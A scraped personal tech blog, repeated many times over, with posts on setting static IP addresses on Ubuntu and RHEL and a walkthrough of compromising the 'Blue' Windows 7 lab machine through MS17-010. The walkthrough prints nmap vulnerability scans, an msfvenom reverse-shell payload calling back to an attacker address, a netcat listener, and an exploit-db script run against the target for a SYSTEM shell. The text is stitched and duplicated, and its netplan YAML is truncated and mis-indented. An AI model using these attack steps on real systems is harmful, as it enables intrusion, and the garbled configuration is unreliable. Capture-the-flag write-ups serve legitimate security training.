How to setup Static IP address on ubuntu server 20.04

No Comments
Task: DNS: 192.168.56.1 Gateway: 192.168.56.1 Netmask: 255.255.255.0 IPv4: 192.168.56.12 sudo vim /etc/netplan/00-installer-config.yaml # This is the network config written by 'Samdup' network: version: 2 renderer: networkd ethernets: enp0s3: dhcp4: true…

How to setup Static IP address on ubuntu server 20.04

Task: DNS: 192.168.56.1 Gateway: 192.168.56.1 Netmask: 255.255.255.0 IPv4: 192.168.56.12 sudo vim /etc/netplan/00-installer-config.yaml # This is the network config written by 'Samdup' network: version: 2 renderer: networkd ethernets: enp0s3: dhcp4: true…

How to setup Static IP address on ubuntu server 20.04

Task: DNS: 192.168.56.1 Gateway: 192.168.56.1 Netmask: 255.255.255.0 IPv4: 192.168.56.12 sudo vim /etc/netplan/00-installer-config.yaml # This is the network config written by 'Samdup' network: version: 2 renderer: networkd ethernets: enp0s3: dhcp4: true…

How to setup Static IP address on ubuntu server 20.04

Task: DNS: 192.168.56.1 Gateway: 192.168.56.1 Netmask: 255.255.255.0 IPv4: 192.168.56.12 sudo vim /etc/netplan/00-installer-config.yaml # This is the network config written by 'Samdup' network: version: 2 renderer: networkd ethernets: enp0s3: dhcp4: true enp0s8: dhcp4: no dhcp6: no addresses: [192.168.56.12/24,] gateway4: 192.168.56.1 nameservers: addresses: [8.8.8.8, 8.8.4.4   sudo netplan apply

How to setup Static IP address on ubuntu server 20.04

Task: 
DNS: 192.168.56.1
Gateway: 192.168.56.1
Netmask: 255.255.255.0
IPv4: 192.168.56.12 

sudo vim /etc/netplan/00-installer-config.yaml
# This is the network config written by 'Samdup'
network:
version: 2
renderer: networkd 
ethernets:
enp0s3:
dhcp4: true
enp0s8:
dhcp4: no
dhcp6: no
addresses: [192.168.56.12/24,]
gateway4: 192.168.56.1
nameservers:
addresses: [8.8.8.8, 8.8.4.4

 

sudo netplan apply 

How to setup static IP addresse on RHEL8 or CentOs

Although there are many benefits of assigning static IP address to a machine, it really helps me to stay organized and can monitor my machines with more convenience. Besides, it became a habit that whenever I have to access machines from Vmware or VirtualBox, I like to SSH to it from my host machine. So, in this article I will share how to set a static IP address to your machine without using any Graphical Tools (because 99.9% of the servers which I had worked have no GUI, moreover I enjoy the power it caters).

Task:

Assign a Static IP address using following information (you can alter it based on your Host-only Network IP address)
IP address: 192.168.56.11
Default Gateway: 192.168.56.1
DNS: 192.168.56.1
Netmask: 255:255:255:0

I ran a ifconfig on my machine. You can clearly see that I have two Network Interface (ifname) slots and one is empty (i.e. ens192) (By the way, you can click on the image to magnify the view)

Command:

First, let’s run

nmcli c s

nmcli is the networking management tool or the package we are going to use (although nmtui is a great option but it may not be available on all the server)

c is the shorthand of connection

s is to show

To know the interface name and other details…

Yes. the above command did help us to confirm our understanding which we inferred from the ifconfig result.

Here we go

nmcli connection add con-name lab ifname ens192 type ethernet autoconnect yes ipv4.addresses 192.168.56.11/24 ipv4.dns 192.168.56.1 ipv4.method manual

Narration:

Although you can understand what each flag does by simple doing a man nmcli , let me do a little explanation just to have a grab of the concept for myself.

We are adding (add) a new connection name (con-name) called lab on the network interface (ifname) ens192, which connects automatically with IP address 192.168.56.11/24 (and netmask 255.255.255.0) using nmcli package.

Method manual means it is a static IP assignment. Until we explicitly change the IP address, it won’t get like how we experience with our home devices (which are on DHCP).

nmcli connection lab up

It appears that the new connection is ready despite we don’t run the aforementioned command, however, I like to run it (because I am afraid it may not be the case in an exam environment or real server that you will have to manage).

To verify the result…

ifconfig

We got IP address and Netmask correct

cat /etc/resolv.conf

We got DNS correct

However, we did get the Gateway configured.

route -n

It is indeed bless in disguise because we got the opportunity to learn how to edit the value in case we need in the future. I know the command is something to do with edit so, let me know quickly run a man nmcli

The above screenshot is nothing but the output of man command.

Method 1

nmcli connection edit type ethernet con-name lab

It will prompt you an interactive shell. You have to choose set option

ipv4.gateway 192.168.56.1

then press q to exit and save.

Method 2  (Referred from this site)

I really like this command more. It’s simple and easy to get the jobs done

nmcli connection modify lab ipv4.gateway 192.168.56.1

To verify:

route -n

Combined output result is in the screenshot

Finally we have to reboot the machine and check whether it is working fine or not.

Yes, everything is working perfect and just to confirm you about the Gateway, I enclosed the result in here.

route -n

 

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04

How to setup static IP addresse on RHEL8 or CentOs

Taking down Blue (a window machine), without using Metasploit

How to setup Static IP address on ubuntu server 20.04
How to setup static IP addresse on RHEL8 or CentOs
Taking down Blue (a window machine), without using Metasploit
Taking down Legacy (A Window Machine) without using Metasploit
My approach to Vegeta Machine
Fix for Error “Before you can run vmware several modules must be compiled”
rooting cybersploit 2 machine ?
Shelling Decoy
Let’s pwn cybersploit machine
Let’s take down victim01
Task: 
DNS: 192.168.56.1
Gateway: 192.168.56.1
Netmask: 255.255.255.0
IPv4: 192.168.56.12 

sudo vim /etc/netplan/00-installer-config.yaml
# This is the network config written by 'Samdup'
network:
version: 2
renderer: networkd 
ethernets:
enp0s3:
dhcp4: true
enp0s8:
dhcp4: no
dhcp6: no
addresses: [192.168.56.12/24,]
gateway4: 192.168.56.1
nameservers:
addresses: [8.8.8.8, 8.8.4.4

 

sudo netplan apply 

Although there are many benefits of assigning static IP address to a machine, it really helps me to stay organized and can monitor my machines with more convenience. Besides, it became a habit that whenever I have to access machines from Vmware or VirtualBox, I like to SSH to it from my host machine. So, in this article I will share how to set a static IP address to your machine without using any Graphical Tools (because 99.9% of the servers which I had worked have no GUI, moreover I enjoy the power it caters).

Task:

Assign a Static IP address using following information (you can alter it based on your Host-only Network IP address)
IP address: 192.168.56.11
Default Gateway: 192.168.56.1
DNS: 192.168.56.1
Netmask: 255:255:255:0

I ran a ifconfig on my machine. You can clearly see that I have two Network Interface (ifname) slots and one is empty (i.e. ens192) (By the way, you can click on the image to magnify the view)

Command:

First, let’s run

nmcli c s

nmcli is the networking management tool or the package we are going to use (although nmtui is a great option but it may not be available on all the server)

c is the shorthand of connection

s is to show

To know the interface name and other details…

Yes. the above command did help us to confirm our understanding which we inferred from the ifconfig result.

Here we go

nmcli connection add con-name lab ifname ens192 type ethernet autoconnect yes ipv4.addresses 192.168.56.11/24 ipv4.dns 192.168.56.1 ipv4.method manual

Narration:

Although you can understand what each flag does by simple doing a man nmcli , let me do a little explanation just to have a grab of the concept for myself.

We are adding (add) a new connection name (con-name) called lab on the network interface (ifname) ens192, which connects automatically with IP address 192.168.56.11/24 (and netmask 255.255.255.0) using nmcli package.

Method manual means it is a static IP assignment. Until we explicitly change the IP address, it won’t get like how we experience with our home devices (which are on DHCP).

nmcli connection lab up

It appears that the new connection is ready despite we don’t run the aforementioned command, however, I like to run it (because I am afraid it may not be the case in an exam environment or real server that you will have to manage).

To verify the result…

ifconfig

We got IP address and Netmask correct

cat /etc/resolv.conf

We got DNS correct

However, we did get the Gateway configured.

route -n

It is indeed bless in disguise because we got the opportunity to learn how to edit the value in case we need in the future. I know the command is something to do with edit so, let me know quickly run a man nmcli

The above screenshot is nothing but the output of man command.

Method 1

nmcli connection edit type ethernet con-name lab

It will prompt you an interactive shell. You have to choose set option

ipv4.gateway 192.168.56.1

then press q to exit and save.

Method 2  (Referred from this site)

I really like this command more. It’s simple and easy to get the jobs done

nmcli connection modify lab ipv4.gateway 192.168.56.1

To verify:

route -n

Combined output result is in the screenshot

Finally we have to reboot the machine and check whether it is working fine or not.

Yes, everything is working perfect and just to confirm you about the Gateway, I enclosed the result in here.

route -n

 

Today I am going to take down a machine called ‘Blue’. It’s a window 7 based machine. I didn’t expect that I could pwn the machine quite easily… Anyway, here is my walkthrough of it. By the way, it is not necessary mean that it is the sole way to compromise the machine. Ok enough said, let’s do some work…

nmap -sC -sV 10.10.10.40 -o nmap1.log
PORT STATE SERVICE VERSION [6/13]
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
nmap --script smb-vuln* -o smb-vuln.log 10.10.10.40
Nmap scan report for 10.10.10.40 Host is up (0.43s latency). 
Not shown: 991 closed ports PORT STATE SERVICE 
135/tcp open msrpc 139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
49152/tcp open unknown 
49153/tcp open unknown 
49154/tcp open unknown 
49155/tcp open unknown 
49156/tcp open unknown 
49157/tcp open unknown 

Host script results: 
|_smb-vuln-ms10-054: false 
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND 
| smb-vuln-ms17-010: 
| VULNERABLE: 
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 
| State: VULNERABLE 
| IDs: CVE:CVE-2017-0143 
| Risk factor: HIGH 
| A critical remote code execution vulnerability exists in Microsoft SMBv1 
| servers (ms17-010).

After googling, I find this repository has everything you need for MS17-010 (aka eternal blue)

git clone https://github.com/helviojunior/MS17-010.git

cd MS17-010

We need to develop a simple exploit (which could create reverse connection back from Window 7 machine to our Kali Linux machine). Remember, we are never going to depend on Meterpreter shell which is not allowed in the exam therefore, in lieu of aforementioned shell, I am going to use the shell_reverse_tcp shell.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=1337 -f exe > blue.exe

I don’t think you require me to explain what those option does because I have done it in my previous post. It is here.

Although MS17-010 contains the exploit but I didn’t use that, instead I did manually went to search an exploit from exploit-db

searchsploit MS17-010

cp /usr/share/exploitdb/exploits/windows/remote/42315.py .

Then we need to modify the exploit code. (I have highlighted the line where it is required to modify)

You need to place the guest username (perhaps you can see either from nmap result or following command can help you to understand there is a guest user). By the way, there is a two way to fill the guest user. One is conventional way to place username as guest and other way is simply filling the place by // (yes two forward slashes in between the quote).

Once modification is done then follow the following steps..

I used to divide the Terminal by using tmux and, in one shell you need to wait the reverse connection from the Window Machine.

nc -lvp 1234

And on another shell

python 42315.py 10.10.10.40

Once you are successful, you will get the system32 prompt like the screenshot below..


User flag (remember type in window command is same as cat in Linux – I know this claim is too much but let us be like this for time being)

Finally the root flag…

Task: 
DNS: 192.168.56.1
Gateway: 192.168.56.1
Netmask: 255.255.255.0
IPv4: 192.168.56.12 

sudo vim /etc/netplan/00-installer-config.yaml
# This is the network config written by 'Samdup'
network:
version: 2
renderer: networkd 
ethernets:
enp0s3:
dhcp4: true
enp0s8:
dhcp4: no
dhcp6: no
addresses: [192.168.56.12/24,]
gateway4: 192.168.56.1
nameservers:
addresses: [8.8.8.8, 8.8.4.4

 

sudo netplan apply 

Although there are many benefits of assigning static IP address to a machine, it really helps me to stay organized and can monitor my machines with more convenience. Besides, it became a habit that whenever I have to access machines from Vmware or VirtualBox, I like to SSH to it from my host machine. So, in this article I will share how to set a static IP address to your machine without using any Graphical Tools (because 99.9% of the servers which I had worked have no GUI, moreover I enjoy the power it caters).

Task:

Assign a Static IP address using following information (you can alter it based on your Host-only Network IP address)
IP address: 192.168.56.11
Default Gateway: 192.168.56.1
DNS: 192.168.56.1
Netmask: 255:255:255:0

I ran a ifconfig on my machine. You can clearly see that I have two Network Interface (ifname) slots and one is empty (i.e. ens192) (By the way, you can click on the image to magnify the view)

Command:

First, let’s run

nmcli c s

nmcli is the networking management tool or the package we are going to use (although nmtui is a great option but it may not be available on all the server)

c is the shorthand of connection

s is to show

To know the interface name and other details…

Yes. the above command did help us to confirm our understanding which we inferred from the ifconfig result.

Here we go

nmcli connection add con-name lab ifname ens192 type ethernet autoconnect yes ipv4.addresses 192.168.56.11/24 ipv4.dns 192.168.56.1 ipv4.method manual

Narration:

Although you can understand what each flag does by simple doing a man nmcli , let me do a little explanation just to have a grab of the concept for myself.

We are adding (add) a new connection name (con-name) called lab on the network interface (ifname) ens192, which connects automatically with IP address 192.168.56.11/24 (and netmask 255.255.255.0) using nmcli package.

Method manual means it is a static IP assignment. Until we explicitly change the IP address, it won’t get like how we experience with our home devices (which are on DHCP).

nmcli connection lab up

It appears that the new connection is ready despite we don’t run the aforementioned command, however, I like to run it (because I am afraid it may not be the case in an exam environment or real server that you will have to manage).

To verify the result…

ifconfig

We got IP address and Netmask correct

cat /etc/resolv.conf

We got DNS correct

However, we did get the Gateway configured.

route -n

It is indeed bless in disguise because we got the opportunity to learn how to edit the value in case we need in the future. I know the command is something to do with edit so, let me know quickly run a man nmcli

The above screenshot is nothing but the output of man command.

Method 1

nmcli connection edit type ethernet con-name lab

It will prompt you an interactive shell. You have to choose set option

ipv4.gateway 192.168.56.1

then press q to exit and save.

Method 2  (Referred from this site)

I really like this command more. It’s simple and easy to get the jobs done

nmcli connection modify lab ipv4.gateway 192.168.56.1

To verify:

route -n

Combined output result is in the screenshot

Finally we have to reboot the machine and check whether it is working fine or not.

Yes, everything is working perfect and just to confirm you about the Gateway, I enclosed the result in here.

route -n

 

Today I am going to take down a machine called ‘Blue’. It’s a window 7 based machine. I didn’t expect that I could pwn the machine quite easily… Anyway, here is my walkthrough of it. By the way, it is not necessary mean that it is the sole way to compromise the machine. Ok enough said, let’s do some work…

nmap -sC -sV 10.10.10.40 -o nmap1.log
PORT STATE SERVICE VERSION [6/13]
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
nmap --script smb-vuln* -o smb-vuln.log 10.10.10.40
Nmap scan report for 10.10.10.40 Host is up (0.43s latency). 
Not shown: 991 closed ports PORT STATE SERVICE 
135/tcp open msrpc 139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
49152/tcp open unknown 
49153/tcp open unknown 
49154/tcp open unknown 
49155/tcp open unknown 
49156/tcp open unknown 
49157/tcp open unknown 

Host script results: 
|_smb-vuln-ms10-054: false 
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND 
| smb-vuln-ms17-010: 
| VULNERABLE: 
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 
| State: VULNERABLE 
| IDs: CVE:CVE-2017-0143 
| Risk factor: HIGH 
| A critical remote code execution vulnerability exists in Microsoft SMBv1 
| servers (ms17-010).

After googling, I find this repository has everything you need for MS17-010 (aka eternal blue)

git clone https://github.com/helviojunior/MS17-010.git

cd MS17-010

We need to develop a simple exploit (which could create reverse connection back from Window 7 machine to our Kali Linux machine). Remember, we are never going to depend on Meterpreter shell which is not allowed in the exam therefore, in lieu of aforementioned shell, I am going to use the shell_reverse_tcp shell.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=1337 -f exe > blue.exe

I don’t think you require me to explain what those option does because I have done it in my previous post. It is here.

Although MS17-010 contains the exploit but I didn’t use that, instead I did manually went to search an exploit from exploit-db

searchsploit MS17-010

cp /usr/share/exploitdb/exploits/windows/remote/42315.py .

Then we need to modify the exploit code. (I have highlighted the line where it is required to modify)

You need to place the guest username (perhaps you can see either from nmap result or following command can help you to understand there is a guest user). By the way, there is a two way to fill the guest user. One is conventional way to place username as guest and other way is simply filling the place by // (yes two forward slashes in between the quote).

Once modification is done then follow the following steps..

I used to divide the Terminal by using tmux and, in one shell you need to wait the reverse connection from the Window Machine.

nc -lvp 1234

And on another shell

python 42315.py 10.10.10.40

Once you are successful, you will get the system32 prompt like the screenshot below..


User flag (remember type in window command is same as cat in Linux – I know this claim is too much but let us be like this for time being)

Finally the root flag…

Task: 
DNS: 192.168.56.1
Gateway: 192.168.56.1
Netmask: 255.255.255.0
IPv4: 192.168.56.12 

sudo vim /etc/netplan/00-installer-config.yaml
# This is the network config written by 'Samdup'
network:
version: 2
renderer: networkd 
ethernets:
enp0s3:
dhcp4: true
enp0s8:
dhcp4: no
dhcp6: no
addresses: [192.168.56.12/24,]
gateway4: 192.168.56.1
nameservers:
addresses: [8.8.8.8, 8.8.4.4

 

sudo netplan apply 

Although there are many benefits of assigning static IP address to a machine, it really helps me to stay organized and can monitor my machines with more convenience. Besides, it became a habit that whenever I have to access machines from Vmware or VirtualBox, I like to SSH to it from my host machine. So, in this article I will share how to set a static IP address to your machine without using any Graphical Tools (because 99.9% of the servers which I had worked have no GUI, moreover I enjoy the power it caters).

Task:

Assign a Static IP address using following information (you can alter it based on your Host-only Network IP address)
IP address: 192.168.56.11
Default Gateway: 192.168.56.1
DNS: 192.168.56.1
Netmask: 255:255:255:0

I ran a ifconfig on my machine. You can clearly see that I have two Network Interface (ifname) slots and one is empty (i.e. ens192) (By the way, you can click on the image to magnify the view)

Command:

First, let’s run

nmcli c s

nmcli is the networking management tool or the package we are going to use (although nmtui is a great option but it may not be available on all the server)

c is the shorthand of connection

s is to show

To know the interface name and other details…

Yes. the above command did help us to confirm our understanding which we inferred from the ifconfig result.

Here we go

nmcli connection add con-name lab ifname ens192 type ethernet autoconnect yes ipv4.addresses 192.168.56.11/24 ipv4.dns 192.168.56.1 ipv4.method manual

Narration:

Although you can understand what each flag does by simple doing a man nmcli , let me do a little explanation just to have a grab of the concept for myself.

We are adding (add) a new connection name (con-name) called lab on the network interface (ifname) ens192, which connects automatically with IP address 192.168.56.11/24 (and netmask 255.255.255.0) using nmcli package.

Method manual means it is a static IP assignment. Until we explicitly change the IP address, it won’t get like how we experience with our home devices (which are on DHCP).

nmcli connection lab up

It appears that the new connection is ready despite we don’t run the aforementioned command, however, I like to run it (because I am afraid it may not be the case in an exam environment or real server that you will have to manage).

To verify the result…

ifconfig

We got IP address and Netmask correct

cat /etc/resolv.conf

We got DNS correct

However, we did get the Gateway configured.

route -n

It is indeed bless in disguise because we got the opportunity to learn how to edit the value in case we need in the future. I know the command is something to do with edit so, let me know quickly run a man nmcli

The above screenshot is nothing but the output of man command.

Method 1

nmcli connection edit type ethernet con-name lab

It will prompt you an interactive shell. You have to choose set option

ipv4.gateway 192.168.56.1

then press q to exit and save.

Method 2  (Referred from this site)

I really like this command more. It’s simple and easy to get the jobs done

nmcli connection modify lab ipv4.gateway 192.168.56.1

To verify:

route -n

Combined output result is in the screenshot

Finally we have to reboot the machine and check whether it is working fine or not.

Yes, everything is working perfect and just to confirm you about the Gateway, I enclosed the result in here.

route -n

 

Today I am going to take down a machine called ‘Blue’. It’s a window 7 based machine. I didn’t expect that I could pwn the machine quite easily… Anyway, here is my walkthrough of it. By the way, it is not necessary mean that it is the sole way to compromise the machine. Ok enough said, let’s do some work…

nmap -sC -sV 10.10.10.40 -o nmap1.log
PORT STATE SERVICE VERSION [6/13]
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
nmap --script smb-vuln* -o smb-vuln.log 10.10.10.40
Nmap scan report for 10.10.10.40 Host is up (0.43s latency). 
Not shown: 991 closed ports PORT STATE SERVICE 
135/tcp open msrpc 139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
49152/tcp open unknown 
49153/tcp open unknown 
49154/tcp open unknown 
49155/tcp open unknown 
49156/tcp open unknown 
49157/tcp open unknown 

Host script results: 
|_smb-vuln-ms10-054: false 
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND 
| smb-vuln-ms17-010: 
| VULNERABLE: 
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 
| State: VULNERABLE 
| IDs: CVE:CVE-2017-0143 
| Risk factor: HIGH 
| A critical remote code execution vulnerability exists in Microsoft SMBv1 
| servers (ms17-010).

After googling, I find this repository has everything you need for MS17-010 (aka eternal blue)

git clone https://github.com/helviojunior/MS17-010.git

cd MS17-010

We need to develop a simple exploit (which could create reverse connection back from Window 7 machine to our Kali Linux machine). Remember, we are never going to depend on Meterpreter shell which is not allowed in the exam therefore, in lieu of aforementioned shell, I am going to use the shell_reverse_tcp shell.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=1337 -f exe > blue.exe

I don’t think you require me to explain what those option does because I have done it in my previous post. It is here.

Although MS17-010 contains the exploit but I didn’t use that, instead I did manually went to search an exploit from exploit-db

searchsploit MS17-010

cp /usr/share/exploitdb/exploits/windows/remote/42315.py .

Then we need to modify the exploit code. (I have highlighted the line where it is required to modify)

You need to place the guest username (perhaps you can see either from nmap result or following command can help you to understand there is a guest user). By the way, there is a two way to fill the guest user. One is conventional way to place username as guest and other way is simply filling the place by // (yes two forward slashes in between the quote).

Once modification is done then follow the following steps..

I used to divide the Terminal by using tmux and, in one shell you need to wait the reverse connection from the Window Machine.

nc -lvp 1234

And on another shell

python 42315.py 10.10.10.40

Once you are successful, you will get the system32 prompt like the screenshot below..


User flag (remember type in window command is same as cat in Linux – I know this claim is too much but let us be like this for time being)

Finally the root flag…

Task: 
DNS: 192.168.56.1
Gateway: 192.168.56.1
Netmask: 255.255.255.0
IPv4: 192.168.56.12 

sudo vim /etc/netplan/00-installer-config.yaml
# This is the network config written by 'Samdup'
network:
version: 2
renderer: networkd 
ethernets:
enp0s3:
dhcp4: true
enp0s8:
dhcp4: no
dhcp6: no
addresses: [192.168.56.12/24,]
gateway4: 192.168.56.1
nameservers:
addresses: [8.8.8.8, 8.8.4.4

 

sudo netplan apply 

Although there are many benefits of assigning static IP address to a machine, it really helps me to stay organized and can monitor my machines with more convenience. Besides, it became a habit that whenever I have to access machines from Vmware or VirtualBox, I like to SSH to it from my host machine. So, in this article I will share how to set a static IP address to your machine without using any Graphical Tools (because 99.9% of the servers which I had worked have no GUI, moreover I enjoy the power it caters).

Task:

Assign a Static IP address using following information (you can alter it based on your Host-only Network IP address)
IP address: 192.168.56.11
Default Gateway: 192.168.56.1
DNS: 192.168.56.1
Netmask: 255:255:255:0

I ran a ifconfig on my machine. You can clearly see that I have two Network Interface (ifname) slots and one is empty (i.e. ens192) (By the way, you can click on the image to magnify the view)

Command:

First, let’s run

nmcli c s

nmcli is the networking management tool or the package we are going to use (although nmtui is a great option but it may not be available on all the server)

c is the shorthand of connection

s is to show

To know the interface name and other details…

Yes. the above command did help us to confirm our understanding which we inferred from the ifconfig result.

Here we go

nmcli connection add con-name lab ifname ens192 type ethernet autoconnect yes ipv4.addresses 192.168.56.11/24 ipv4.dns 192.168.56.1 ipv4.method manual

Narration:

Although you can understand what each flag does by simple doing a man nmcli , let me do a little explanation just to have a grab of the concept for myself.

We are adding (add) a new connection name (con-name) called lab on the network interface (ifname) ens192, which connects automatically with IP address 192.168.56.11/24 (and netmask 255.255.255.0) using nmcli package.

Method manual means it is a static IP assignment. Until we explicitly change the IP address, it won’t get like how we experience with our home devices (which are on DHCP).

nmcli connection lab up

It appears that the new connection is ready despite we don’t run the aforementioned command, however, I like to run it (because I am afraid it may not be the case in an exam environment or real server that you will have to manage).

To verify the result…

ifconfig

We got IP address and Netmask correct

cat /etc/resolv.conf

We got DNS correct

However, we did get the Gateway configured.

route -n

It is indeed bless in disguise because we got the opportunity to learn how to edit the value in case we need in the future. I know the command is something to do with edit so, let me know quickly run a man nmcli

The above screenshot is nothing but the output of man command.

Method 1

nmcli connection edit type ethernet con-name lab

It will prompt you an interactive shell. You have to choose set option

ipv4.gateway 192.168.56.1

then press q to exit and save.

Method 2  (Referred from this site)

I really like this command more. It’s simple and easy to get the jobs done

nmcli connection modify lab ipv4.gateway 192.168.56.1

To verify:

route -n

Combined output result is in the screenshot

Finally we have to reboot the machine and check whether it is working fine or not.

Yes, everything is working perfect and just to confirm you about the Gateway, I enclosed the result in here.

route -n

 

Today I am going to take down a machine called ‘Blue’. It’s a window 7 based machine. I didn’t expect that I could pwn the machine quite easily… Anyway, here is my walkthrough of it. By the way, it is not necessary mean that it is the sole way to compromise the machine. Ok enough said, let’s do some work…

nmap -sC -sV 10.10.10.40 -o nmap1.log
PORT STATE SERVICE VERSION [6/13]
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
nmap --script smb-vuln* -o smb-vuln.log 10.10.10.40
Nmap scan report for 10.10.10.40 Host is up (0.43s latency). 
Not shown: 991 closed ports PORT STATE SERVICE 
135/tcp open msrpc 139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
49152/tcp open unknown 
49153/tcp open unknown 
49154/tcp open unknown 
49155/tcp open unknown 
49156/tcp open unknown 
49157/tcp open unknown 

Host script results: 
|_smb-vuln-ms10-054: false 
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND 
| smb-vuln-ms17-010: 
| VULNERABLE: 
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 
| State: VULNERABLE 
| IDs: CVE:CVE-2017-0143 
| Risk factor: HIGH 
| A critical remote code execution vulnerability exists in Microsoft SMBv1 
| servers (ms17-010).

After googling, I find this repository has everything you need for MS17-010 (aka eternal blue)

git clone https://github.com/helviojunior/MS17-010.git

cd MS17-010

We need to develop a simple exploit (which could create reverse connection back from Window 7 machine to our Kali Linux machine). Remember, we are never going to depend on Meterpreter shell which is not allowed in the exam therefore, in lieu of aforementioned shell, I am going to use the shell_reverse_tcp shell.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=1337 -f exe > blue.exe

I don’t think you require me to explain what those option does because I have done it in my previous post. It is here.

Although MS17-010 contains the exploit but I didn’t use that, instead I did manually went to search an exploit from exploit-db

searchsploit MS17-010

cp /usr/share/exploitdb/exploits/windows/remote/42315.py .

Then we need to modify the exploit code. (I have highlighted the line where it is required to modify)

You need to place the guest username (perhaps you can see either from nmap result or following command can help you to understand there is a guest user). By the way, there is a two way to fill the guest user. One is conventional way to place username as guest and other way is simply filling the place by // (yes two forward slashes in between the quote).

Once modification is done then follow the following steps..

I used to divide the Terminal by using tmux and, in one shell you need to wait the reverse connection from the Window Machine.

nc -lvp 1234

And on another shell

python 42315.py 10.10.10.40

Once you are successful, you will get the system32 prompt like the screenshot below..


User flag (remember type in window command is same as cat in Linux – I know this claim is too much but let us be like this for time being)

Finally the root flag…

Task: 
DNS: 192.168.56.1
Gateway: 192.168.56.1
Netmask: 255.255.255.0
IPv4: 192.168.56.12 

sudo vim /etc/netplan/00-installer-config.yaml
